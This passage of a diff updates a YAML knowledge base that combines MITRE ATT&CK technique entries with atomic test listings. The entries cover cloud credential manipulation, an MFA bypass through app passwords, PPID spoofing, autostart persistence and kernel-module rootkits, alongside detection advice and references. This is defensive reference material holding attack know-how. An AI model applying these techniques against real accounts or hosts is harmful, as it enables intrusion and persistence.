+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -19955,12 +20254,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -19969,6 +20275,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19977,13 +20284,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -20009,10 +20319,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -20021,10 +20339,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -20041,9 +20369,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests:
     - name: Azure AD Application Hijacking - Service Principal
@@ -20249,7 +20574,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -20338,7 +20662,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1134.004:
@@ -20396,7 +20719,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -20421,12 +20744,11 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -20452,7 +20774,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -20466,7 +20787,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -20493,8 +20813,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -20505,7 +20825,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1055.014:
@@ -20576,7 +20897,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20603,7 +20924,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -20643,7 +20963,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20663,12 +20983,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20722,11 +21041,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20813,9 +21131,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -20828,12 +21146,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -20869,16 +21186,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -20919,7 +21235,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests:
     - name: Azure AD - adding user to Azure AD role
@@ -21158,138 +21473,137 @@ privilege-escalation:
         elevation_required: false
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
